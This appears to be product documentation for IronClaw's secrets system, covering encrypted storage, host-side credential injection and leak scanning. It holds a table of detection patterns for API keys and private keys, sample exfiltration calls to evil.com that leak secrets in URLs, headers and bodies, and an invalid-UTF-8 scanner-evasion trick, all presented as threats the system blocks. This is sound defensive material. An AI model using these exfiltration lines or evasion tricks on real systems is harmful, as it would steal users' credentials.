Documentation Index
Fetch the complete documentation index at: https://mintlify.com/nearai/ironclaw/llms.txt
Use this file to discover all available pages before exploring further.
IronClaw ensures that secrets are never exposed to WASM tools. Credentials are encrypted at rest, injected at the host boundary during HTTP requests, and all outputs are scanned for leakage.
Security Model
Three core principles:
- Secrets never enter WASM memory - Tools can check existence, not read values
- Encryption at rest - AES-256-GCM with per-secret key derivation
- Leak detection - All outbound requests and responses are scanned
Architecture
┌─────────────────────────────────────────────────────────────────┐
│ Secret Lifecycle │
│ │
│ User stores secret ──► Encrypt (AES-256-GCM) ──► PostgreSQL │
│ (per-secret HKDF key) │
│ │
│ WASM requests HTTP ──► Allowlist check ──► Decrypt secret │
│ │ │
│ ▼ │
│ Leak scan request ──► Inject │
│ (block if leaked) credential │
│ │ │
│ ▼ │
│ Execute HTTP │
│ │ │
│ ▼ │
│ Leak scan response ◄── Response │
│ (redact if leaked) │
│ │ │
│ ▼ │
│ Return to WASM (sanitized) │
└─────────────────────────────────────────────────────────────────┘
Encryption at Rest
Cryptographic Primitives
- Algorithm: AES-256-GCM (authenticated encryption)
- Key derivation: HKDF-SHA256 (per-secret keys from master key)
- Salt size: 32 bytes (random per secret)
- Nonce size: 12 bytes (random per encryption)
- Tag size: 16 bytes (authentication tag)
Key Derivation
Each secret gets its own encryption key derived from the master key:
master_key (from env/keychain) ──┬──► HKDF-SHA256 ──► derived_key
│
per-secret salt (32 bytes) ─────┘
From src/secrets/crypto.rs:129-140:
fn derive_key(&self, salt: &[u8]) -> Result<[u8; 32]> {
    let master_bytes = self.master_key.expose_secret().as_bytes();
    // HKDF extract + expand
    let hk = Hkdf::<Sha256>::new(Some(salt), master_bytes);
    let mut derived = [0u8; 32];
    hk.expand(b"near-agent-secrets-v1", &mut derived)?;
    Ok(derived)
}
This means:
- Two secrets with the same plaintext have different ciphertexts
- Compromising one secret doesn’t compromise others
- Master key rotation requires re-encrypting all secrets
Encryption Process
From src/secrets/crypto.rs:66-93:
pub fn encrypt(&self, plaintext: &[u8]) -> Result<(Vec<u8>, Vec<u8>)> {
    // 1. Generate random salt
    let salt = Self::generate_salt(); // 32 random bytes
    // 2. Derive encryption key from master key + salt
    let derived_key = self.derive_key(&salt)?;
    // 3. Create AES-256-GCM cipher
    let cipher = Aes256Gcm::new_from_slice(&derived_key)?;
    // 4. Generate random nonce
    let nonce = Aes256Gcm::generate_nonce(&mut OsRng); // 12 random bytes
    // 5. Encrypt (ciphertext includes the authentication tag)
    let ciphertext = cipher.encrypt(&nonce, plaintext)?;
    // 6. Combine: nonce || ciphertext || tag
    let mut encrypted = Vec::new();
    encrypted.extend_from_slice(&nonce);
    encrypted.extend_from_slice(&ciphertext);
    Ok((encrypted, salt))
}
Stored in database:
- encrypted_value: nonce (12 bytes) + ciphertext + tag (16 bytes)
- key_salt: 32-byte salt for key derivation
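To make the layout concrete, here is a hypothetical sketch (not the crate's actual parsing code) of splitting a stored blob back into its parts, using only the nonce and tag sizes stated above:

```rust
// Hypothetical sketch: splitting the stored blob back into its parts.
// Layout assumed from above: nonce (12 bytes) || ciphertext || tag (16 bytes),
// where AES-256-GCM appends the authentication tag to the ciphertext.
const NONCE_LEN: usize = 12;
const TAG_LEN: usize = 16;

fn split_encrypted(blob: &[u8]) -> Option<(&[u8], &[u8])> {
    // A valid blob holds at least a nonce and a tag (empty plaintext).
    if blob.len() < NONCE_LEN + TAG_LEN {
        return None;
    }
    Some(blob.split_at(NONCE_LEN))
}

fn main() {
    // 12-byte nonce + 5-byte ciphertext + 16-byte tag = 33 bytes total
    let blob = vec![0u8; 33];
    let (nonce, ct_and_tag) = split_encrypted(&blob).unwrap();
    assert_eq!(nonce.len(), 12);
    assert_eq!(ct_and_tag.len(), 21); // ciphertext (5) + tag (16)
    assert!(split_encrypted(&[0u8; 10]).is_none()); // too short to be valid
    println!("ok");
}
```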
Decryption Process
From src/secrets/crypto.rs:99-126:
pub fn decrypt(&self, encrypted_value: &[u8], salt: &[u8]) -> Result<DecryptedSecret> {
    // 1. Derive the same key using stored salt
    let derived_key = self.derive_key(salt)?;
    // 2. Create cipher
    let cipher = Aes256Gcm::new_from_slice(&derived_key)?;
    // 3. Split: nonce || ciphertext
    let (nonce_bytes, ciphertext) = encrypted_value.split_at(12);
    let nonce = Nonce::from_slice(nonce_bytes);
    // 4. Decrypt + verify authentication tag
    let plaintext = cipher.decrypt(nonce, ciphertext)?; // Fails if tampered
    DecryptedSecret::from_bytes(plaintext)
}
Decryption automatically verifies the authentication tag. Tampered ciphertext is rejected.
Master Key Storage
Option 1: OS Keychain (Recommended)
Auto-generated during onboarding:
ironclaw onboard
# Generates 32-byte key, stores in:
# - macOS: Keychain Access
# - Windows: Credential Manager
# - Linux: Secret Service (GNOME Keyring, KWallet)
Implementation in src/secrets/keychain.rs.
Option 2: Environment Variable
For CI/Docker deployments:
# Generate secure key
openssl rand -base64 32
# Set environment variable
export SECRETS_MASTER_KEY="<generated-key>"
Key requirements:
- Minimum length: 32 bytes
- Entropy: High-quality randomness (use openssl rand, not keyboard mashing)
- Storage: Secure vault (e.g., AWS Secrets Manager, HashiCorp Vault)
Credential Injection
WASM tools never receive plaintext secrets. Instead, the host injects credentials at the HTTP boundary.
WASM Perspective
Tools can only:
- Check existence:
let exists = secret_exists("openai_api_key"); // Returns: true/false
- Trigger injection (implicitly via HTTP capability):
{
  "http": {
    "credentials": [
      {
        "secret_name": "openai_api_key",
        "location": { "AuthorizationBearer": {} },
        "host_patterns": ["api.openai.com"]
      }
    ]
  }
}
Tools cannot:
- ❌ Read secret values
- ❌ List available secrets
- ❌ Access secrets not in their allowed_names
Host Injection Process
From src/tools/wasm/credential_injector.rs:
// 1. WASM calls http_request("https://api.openai.com/v1/chat", ...)
pub async fn http_request(mut url: String, mut headers: Vec<(String, String)>) -> Result<Response> {
    // 2. Check allowlist
    allowlist_validator.validate(&url, "POST")?;
    // 3. Find matching credential mapping
    let mapping = find_credential_for_host(&url)?;
    // 4. Decrypt secret (in memory only)
    let decrypted = secrets_store.get_decrypted(user_id, &mapping.secret_name).await?;
    // 5. Inject based on location
    match mapping.location {
        CredentialLocation::AuthorizationBearer => {
            headers.push(("Authorization".into(), format!("Bearer {}", decrypted.expose())));
        }
        CredentialLocation::Header { name, prefix } => {
            let value = if let Some(p) = prefix {
                format!("{}{}", p, decrypted.expose())
            } else {
                decrypted.expose().to_string()
            };
            headers.push((name, value));
        }
        CredentialLocation::QueryParam { name } => {
            url = add_query_param(&url, &name, decrypted.expose());
        }
    }
    // 6. Secret is dropped here (memory zeroed)
    // 7. Execute request
    execute_http(&url, &headers).await
}
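Step 3 above depends on matching the request host against each mapping's host_patterns. The following is a simplified, std-only stand-in for that matching (the function name and the wildcard rule are assumptions, not the crate's actual logic), supporting exact hosts and a leading `*.` wildcard:

```rust
// Simplified stand-in for matching a credential mapping's host_patterns
// against a request host. Supports an exact host or a leading "*." wildcard;
// the real matcher in IronClaw may follow different rules.
fn host_matches(pattern: &str, host: &str) -> bool {
    if let Some(suffix) = pattern.strip_prefix("*.") {
        // "*.example.com" matches any subdomain, but not the bare apex,
        // and requires a '.' immediately before the suffix.
        host.ends_with(suffix)
            && host.len() > suffix.len()
            && host.as_bytes()[host.len() - suffix.len() - 1] == b'.'
    } else {
        pattern == host
    }
}

fn main() {
    assert!(host_matches("api.openai.com", "api.openai.com"));
    assert!(!host_matches("api.openai.com", "evil.com"));
    assert!(host_matches("*.example.com", "api.example.com"));
    assert!(!host_matches("*.example.com", "example.com"));
    println!("ok");
}
```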
Injection Locations
From src/secrets/types.rs:198-214:
Authorization Bearer
CredentialLocation::AuthorizationBearer
Injects as:
Authorization: Bearer <secret>
Authorization Basic
CredentialLocation::AuthorizationBasic { username: "api" }
Injects as:
Authorization: Basic <base64(username:secret)>
Custom Header
CredentialLocation::Header {
    name: "X-API-Key",
    prefix: Some("Bearer "),
}
Injects as:
X-API-Key: Bearer <secret>
Query Parameter
CredentialLocation::QueryParam { name: "api_key" }
Injects as:
https://api.example.com/data?api_key=<secret>
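The injection locations above can be exercised with a small sketch. The enum here is a local illustration that mirrors the documented variants (the real CredentialLocation lives in src/secrets/types.rs and may differ); AuthorizationBasic is omitted because it needs base64 encoding:

```rust
// Local mirror of the injection locations, for illustration only.
enum Location {
    AuthorizationBearer,
    Header { name: String, prefix: Option<String> },
    QueryParam { name: String },
}

fn inject(loc: &Location, secret: &str, url: &mut String, headers: &mut Vec<(String, String)>) {
    match loc {
        Location::AuthorizationBearer => {
            headers.push(("Authorization".into(), format!("Bearer {secret}")));
        }
        Location::Header { name, prefix } => {
            let value = match prefix {
                Some(p) => format!("{p}{secret}"),
                None => secret.to_string(),
            };
            headers.push((name.clone(), value));
        }
        Location::QueryParam { name } => {
            // Append with '?' or '&' depending on whether a query string exists.
            let sep = if url.contains('?') { '&' } else { '?' };
            url.push(sep);
            url.push_str(&format!("{name}={secret}"));
        }
    }
}

fn main() {
    let mut url = String::from("https://api.example.com/data");
    let mut headers: Vec<(String, String)> = Vec::new();
    inject(&Location::AuthorizationBearer, "s3cr3t", &mut url, &mut headers);
    assert_eq!(headers[0].1, "Bearer s3cr3t");
    inject(&Location::QueryParam { name: "api_key".into() }, "s3cr3t", &mut url, &mut headers);
    assert_eq!(url, "https://api.example.com/data?api_key=s3cr3t");
    println!("ok");
}
```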
Example: OpenAI API
Capabilities file:
{
  "http": {
    "allowlist": [
      {
        "host": "api.openai.com",
        "path_prefix": "/v1/",
        "methods": ["POST"]
      }
    ],
    "credentials": [
      {
        "secret_name": "openai_api_key",
        "location": { "AuthorizationBearer": {} },
        "host_patterns": ["api.openai.com"]
      }
    ]
  },
  "secrets": {
    "allowed_names": ["openai_api_key"]
  }
}
Flow:
- WASM calls: http_request("https://api.openai.com/v1/chat/completions", ...)
- Host checks: ✓ Allowlist allows this endpoint
- Host finds: Credential mapping for api.openai.com
- Host decrypts: openai_api_key secret
- Host injects: Authorization: Bearer sk-proj-...
- Host executes: HTTP POST with injected header
- WASM receives: Response (after leak scanning)
Leak Detection
All data crossing the WASM boundary is scanned for secrets.
Scan Points
- Outbound HTTP requests (before execution)
- Inbound HTTP responses (before returning to WASM)
  - Response body
  - Response headers (optional)
- Tool outputs (before showing to user)
- User input (before sending to LLM)
  - Detect accidentally pasted secrets
Detection Patterns
From src/safety/leak_detector.rs:414-531:
| Pattern | Example | Action |
|---|---|---|
| OpenAI API key | sk-proj-... | Block |
| Anthropic API key | sk-ant-api... | Block |
| AWS Access Key | AKIAIOSFODNN7EXAMPLE | Block |
| GitHub token | ghp_... | Block |
| GitHub PAT | github_pat_... | Block |
| Stripe key | sk_live_... | Block |
| NEAR AI session | sess_... | Block |
| PEM private key | -----BEGIN PRIVATE KEY----- | Block |
| SSH private key | -----BEGIN OPENSSH PRIVATE KEY----- | Block |
| Google API key | AIza... | Block |
| Slack token | xoxb-... | Block |
| Bearer token | Bearer <long-string> | Redact |
| High-entropy hex | 64-char hex string | Warn |
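The last row of the table (64-character hex, Warn) can be approximated without a regex engine. This is a std-only heuristic for illustration; the real detector uses regex patterns:

```rust
// Heuristic sketch of the "high-entropy hex" pattern above: flag any run
// of 64 or more consecutive hex digits. The actual detector in
// src/safety/leak_detector.rs uses regex patterns, not this loop.
fn contains_long_hex(content: &str) -> bool {
    let mut run = 0usize;
    for c in content.chars() {
        if c.is_ascii_hexdigit() {
            run += 1;
            if run >= 64 {
                return true;
            }
        } else {
            run = 0; // any non-hex character breaks the run
        }
    }
    false
}

fn main() {
    let leak = "deadbeef".repeat(8); // 64 hex chars
    assert!(contains_long_hex(&leak));
    assert!(!contains_long_hex("hello world 1234abcd"));
    println!("ok");
}
```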
Scan Algorithm
Two-phase matching for performance:
Phase 1: Aho-Corasick prefix matching
// Extract literal prefixes from regex patterns
// e.g., "sk-proj-" from r"sk-proj-[a-zA-Z0-9]{20,}"
let prefixes = extract_prefixes(&patterns);
let ac = AhoCorasick::new(&prefixes)?;
// Fast check: does content contain any prefix?
let candidates = ac.find_iter(content);
Phase 2: Full regex validation
// Only check patterns whose prefixes matched
for pattern in candidate_patterns {
    for m in pattern.regex.find_iter(content) {
        matches.push(LeakMatch { ... });
    }
}
This hybrid approach is orders of magnitude faster than checking all regex patterns.
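A minimal, std-only sketch of the two-phase idea (the prefixes and validation rule here are illustrative assumptions): a cheap substring check stands in for Aho-Corasick, and a charset/length check stands in for the full regex.

```rust
// Phase 1 stand-in: cheap substring scan instead of an Aho-Corasick automaton.
fn phase1_candidates<'a>(content: &str, prefixes: &[&'a str]) -> Vec<&'a str> {
    prefixes.iter().copied().filter(|p| content.contains(*p)).collect()
}

// Phase 2 stand-in: approximate r"<prefix>[a-zA-Z0-9]{min_suffix,}" by
// counting alphanumeric characters after each prefix occurrence.
fn phase2_validate(content: &str, prefix: &str, min_suffix: usize) -> bool {
    content.match_indices(prefix).any(|(i, _)| {
        content[i + prefix.len()..]
            .chars()
            .take_while(|c| c.is_ascii_alphanumeric())
            .count()
            >= min_suffix
    })
}

fn main() {
    let content = "header sk-proj-abcdefghijklmnopqrstuv trailer";
    // Phase 1 narrows three patterns down to one candidate...
    let candidates = phase1_candidates(content, &["sk-proj-", "ghp_", "AKIA"]);
    assert_eq!(candidates, vec!["sk-proj-"]);
    // ...and phase 2 confirms the full match.
    assert!(phase2_validate(content, "sk-proj-", 20));
    assert!(!phase2_validate("sk-proj-short", "sk-proj-", 20));
    println!("ok");
}
```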
Leak Actions
From src/safety/leak_detector.rs:46-65:
pub enum LeakAction {
    Block,  // Reject the request/response entirely
    Redact, // Replace secret with [REDACTED]
    Warn,   // Log warning, allow content
}
Block: Critical secrets (API keys, private keys)
if result.should_block {
    return Err(LeakDetectionError::SecretLeakBlocked {
        pattern: "openai_api_key",
        preview: "sk-pr****cdef",
    });
}
Redact: Less critical patterns (bearer tokens)
let redacted = apply_redactions(content, &redact_ranges);
// "Authorization: Bearer ey..." -> "Authorization: [REDACTED]"
Warn: Low-confidence matches (high-entropy hex)
tracing::warn!(
    pattern = "high_entropy_hex",
    preview = "a3f5****b2c1",
    "Potential secret leak detected (warning only)"
);
Secret Masking
Secrets in logs/errors are partially masked:
fn mask_secret(secret: &str) -> String {
    if secret.len() <= 8 {
        return "*".repeat(secret.len());
    }
    let prefix: String = secret.chars().take(4).collect();
    let suffix: String = secret.chars().skip(secret.len() - 4).collect();
    let middle_len = secret.len() - 8;
    format!("{}{}{}", prefix, "*".repeat(middle_len.min(8)), suffix)
}
Examples:
sk-proj-abc123def456ghi789 → sk-p********i789
AKIAIOSFODNN7EXAMPLE → AKIA********MPLE
short → *****
HTTP Request Scanning
From src/safety/leak_detector.rs:294-326:
pub fn scan_http_request(
    &self,
    url: &str,
    headers: &[(String, String)],
    body: Option<&[u8]>,
) -> Result<(), LeakDetectionError> {
    // 1. Scan URL
    self.scan_and_clean(url)?;
    // 2. Scan each header value
    for (name, value) in headers {
        self.scan_and_clean(value)
            .map_err(|e| LeakDetectionError::SecretLeakBlocked {
                pattern: format!("header:{}", name),
                preview: e.to_string(),
            })?;
    }
    // 3. Scan body (use lossy UTF-8 conversion)
    if let Some(body_bytes) = body {
        let body_str = String::from_utf8_lossy(body_bytes);
        self.scan_and_clean(&body_str)?;
    }
    Ok(())
}
This catches exfiltration attempts like:
GET https://evil.com/steal?key=AKIAIOSFODNN7EXAMPLE // ❌ Blocked
POST https://api.example.com
X-Exfil: sk-proj-abc123... // ❌ Blocked
{"stolen": "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"} // ❌ Blocked
Database Schema
Secrets table (PostgreSQL):
CREATE TABLE secrets (
    id              UUID PRIMARY KEY DEFAULT gen_random_uuid(),
    user_id         TEXT NOT NULL,
    name            TEXT NOT NULL,
    encrypted_value BYTEA NOT NULL,     -- nonce || ciphertext || tag
    key_salt        BYTEA NOT NULL,     -- 32-byte salt for HKDF
    provider        TEXT,               -- Optional: "openai", "stripe", etc.
    expires_at      TIMESTAMPTZ,        -- Optional expiration
    last_used_at    TIMESTAMPTZ,        -- Track usage
    usage_count     BIGINT DEFAULT 0,   -- Audit trail
    created_at      TIMESTAMPTZ DEFAULT NOW(),
    updated_at      TIMESTAMPTZ DEFAULT NOW(),
    UNIQUE(user_id, name)               -- One secret per name per user
);
Key points:
- encrypted_value and key_salt stored as binary blobs
- name is case-insensitive (normalized to lowercase)
- usage_count incremented on each injection (audit trail)
- No plaintext values stored anywhere
Secret Lifecycle
1. Creation
use ironclaw::secrets::{SecretsStore, CreateSecretParams};
let params = CreateSecretParams::new("openai_api_key", "sk-proj-...");
store.create("user_123", params).await?;
Flow:
- User provides plaintext secret
- Generate random 32-byte salt
- Derive encryption key via HKDF(master_key, salt)
- Generate random 12-byte nonce
- Encrypt with AES-256-GCM
- Store encrypted_value and key_salt in database
- Zero plaintext memory
2. Existence Check (WASM)
let exists = store.exists("user_123", "openai_api_key").await?;
// Returns: true/false (no decryption needed)
3. Injection (Host Only)
let decrypted = store.get_decrypted("user_123", "openai_api_key").await?;
// Returns: DecryptedSecret (held in secure memory)
// Use immediately
let header = format!("Bearer {}", decrypted.expose());
// DecryptedSecret dropped here, memory zeroed
4. Rotation
let new_params = CreateSecretParams::new("openai_api_key", "sk-proj-NEW...");
store.update("user_123", "openai_api_key", new_params).await?;
Old secret is overwritten, new salt/nonce generated.
5. Deletion
store.delete("user_123", "openai_api_key").await?;
Database row deleted. Encrypted value is lost (irreversible).
Security Audit
Threat: Direct Secret Access
Attack: WASM calls get_secret("openai_api_key")
Defense: Function not exposed. Only secret_exists() is available.
Threat: URL/Body Exfiltration
Attack: WASM includes the secret in a URL or body
http_request("https://evil.com/steal?key=sk-proj-...", ...)
Defense: Leak detector blocks the request before execution.
Threat: Output Echo
Attack: WASM echoes the secret in its response
return format!("Using key: {}", secret); // But WASM never has the secret!
Defense:
- WASM can’t access the secret (no plaintext in memory)
- If somehow leaked, the output sanitizer redacts it
Threat: Binary Body Exfiltration
Attack: Prepend invalid UTF-8 byte to evade string scanning
let mut body = vec![0xFF]; // Invalid UTF-8 lead byte
body.extend_from_slice(b"sk-proj-abc123...");
Defense: Leak detector uses lossy UTF-8 conversion
let body_str = String::from_utf8_lossy(body_bytes);
self.scan_and_clean(&body_str)?; // Still scans the secret
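This defense can be verified directly: the invalid 0xFF byte becomes U+FFFD under lossy conversion, but the ASCII secret after it survives and remains visible to the scanner.

```rust
// Demonstrates why lossy UTF-8 conversion matters for leak scanning:
// a strict conversion fails on the invalid lead byte, while the lossy
// one keeps the ASCII secret intact for pattern matching.
fn main() {
    let mut body: Vec<u8> = vec![0xFF]; // invalid UTF-8 lead byte
    body.extend_from_slice(b"sk-proj-abc123");

    // Strict conversion rejects the whole body...
    assert!(std::str::from_utf8(&body).is_err());

    // ...but lossy conversion still exposes the secret to the scanner.
    let body_str = String::from_utf8_lossy(&body);
    assert!(body_str.contains("sk-proj-abc123"));
    println!("ok");
}
```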
Threat: Database Dump
Attack: Attacker gains read access to PostgreSQL
Defense: All secrets are encrypted. Without master key, ciphertext is useless.
Threat: Master Key Compromise
Attack: Attacker steals SECRETS_MASTER_KEY env var
Defense:
- Use OS keychain (harder to extract)
- Rotate master key + re-encrypt all secrets
- Audit logs for suspicious decryption activity
Best Practices
For Developers
- Never log decrypted secrets
// ❌ BAD
tracing::info!("Using API key: {}", decrypted.expose());
// ✓ GOOD (log only the length, never the value)
tracing::info!("Using API key ({} bytes)", decrypted.len());
- Minimize plaintext lifetime
// Decrypt, use immediately, drop
let decrypted = store.get_decrypted(user, name).await?;
let header = format!("Bearer {}", decrypted.expose());
// decrypted dropped here
- Check leak detection results
let result = leak_detector.scan(&content);
if result.should_block {
return Err(...);
}
if !result.is_clean() {
tracing::warn!("Potential leak: {:?}", result.matches);
}
For Users
- Use short-lived secrets when possible
let params = CreateSecretParams::new("temp_token", "...")
.with_expiry(Utc::now() + Duration::hours(1));
- Rotate secrets regularly
ironclaw config set openai_api_key <new-key>
- Monitor usage
SELECT name, usage_count, last_used_at FROM secrets WHERE user_id = 'you';
- Secure master key
- OS keychain: Backed up with system backups
- Env var: Store in secure vault (AWS Secrets Manager, etc.)
Source Code References
See Also